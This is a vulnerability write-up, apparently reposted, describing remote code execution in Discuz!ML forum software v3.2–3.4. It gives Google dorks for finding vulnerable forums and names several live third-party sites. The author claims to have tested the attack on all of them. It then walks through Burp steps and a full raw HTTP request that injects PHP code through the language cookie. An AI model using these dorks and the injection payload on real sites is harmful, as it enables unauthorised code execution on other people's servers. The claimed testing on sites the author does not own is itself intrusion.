There is vulnerability in Product
Discuz!ML v.3.4 ,
Discuz!ML v.3.2 ,
Discuz!ML v.3.3 product of codersclub.org
CVE ID (Waiting)
Advisory Published: https://www.vulnerability-lab.com/get_content.php?id=2185
Exploit POC:https://www.vulnerability-lab.com/resources/documents/2185.rar
1.0 About
Discuz!ML is a MultiLingual, integrated, full-featured, open-source web-platform created by CodersClub.org for build an Internet community like “Social Network”. There are hundreds of Forum that is created using these software comprises of v3.2,v3.3,v3.4 .
- Discuz! ML official site: http://discuz.ml
- Discuz! ML official forum: http://codersclub.org/discuzx/
Software download site : http://discuz.ml/download
1.2 Example sites using Discuz!ML
http://codersclub.org/
https://www.craxme.com/forum.php
http://www.killersource.net/f/
http://wizard.id/forum
http://bbs.kingsoftstore.com/forum.php
1.3 How TO Distinguish Discuz!ML sites
Generally these sites contains below type of footer or bottom left side of the site .
1.4 Google dork:
Dork 1: “© 2009-2019 codersclub.org”
Dork 2: “MultiLingual version, Rev.”
1.5 POC:Proof Of Concept
1)I have tested in all sites mentioned in 1.2 example sites.
2)All sites represents same behaviour of RCE
3)Take a sample sites http://codersclub.org/discuzx/portal.php
4) http://codersclub.org/discuzx/portal.php the official site of Discuz!ML
5)Browse the Site http://codersclub.org/discuzx/portal.php
6)After page loaded in browser firefox ,now change the proxy to Burp suite
7)Select the English Language Flag as below
9)Forward the request and response
11) Browse the page http://codersclub.org/discuzx/portal.php and intercept the request in Burp and send the request to repeater
12)See the above request carefully .Replace 4gH4_0df5_language=en as 4gH4_0df5_language=en’.phpinfo().’;
12.a)you will find below response showing all phpinfo output.
RAW REQUEST:
====================================================================
GET /discuzx/portal.php HTTP/1.1
Host: codersclub.org
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
Referer: http://codersclub.org/discuzx/forum.php?mod=post&action=newthread&fid=108
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 4gH4_0df5_saltkey=i6z78CBC; 4gH4_0df5_language=en’.phpinfo().’;4gH4_0df5_lastvisit=1560408594; 4gH4_0df5_viewid=tid_6172; 4gH4_0df5_home_readfeed=1560425166; uchome_mylanguage=en; 4gH4_0df5_visitedfid=108D124D101D117D121; 4gH4_0df5_st_p=0%7C1560425279%7Ca0fff244dfafcb3446bff5837994fb98; 4gH4_0df5_st_t=0%7C1560433759%7Ca320f0cfeac708308d2c42da664f7459; 4gH4_0df5_forum_lastvisit=D_101_1560425210D_124_1560425235D_108_1560433759; 4gH4_0df5_secqaa=105.00fce001dea96c4848; 4gH4_0df5_seccode=106.5f8bdf1355212b5450; 4gH4_0df5_sid=oEN241; 4gH4_0df5_sendmail=1; 4gH4_0df5_lastact=1560440381%09member.php%09logging
Connection: close
若有收获,就点个赞吧
0 人点赞
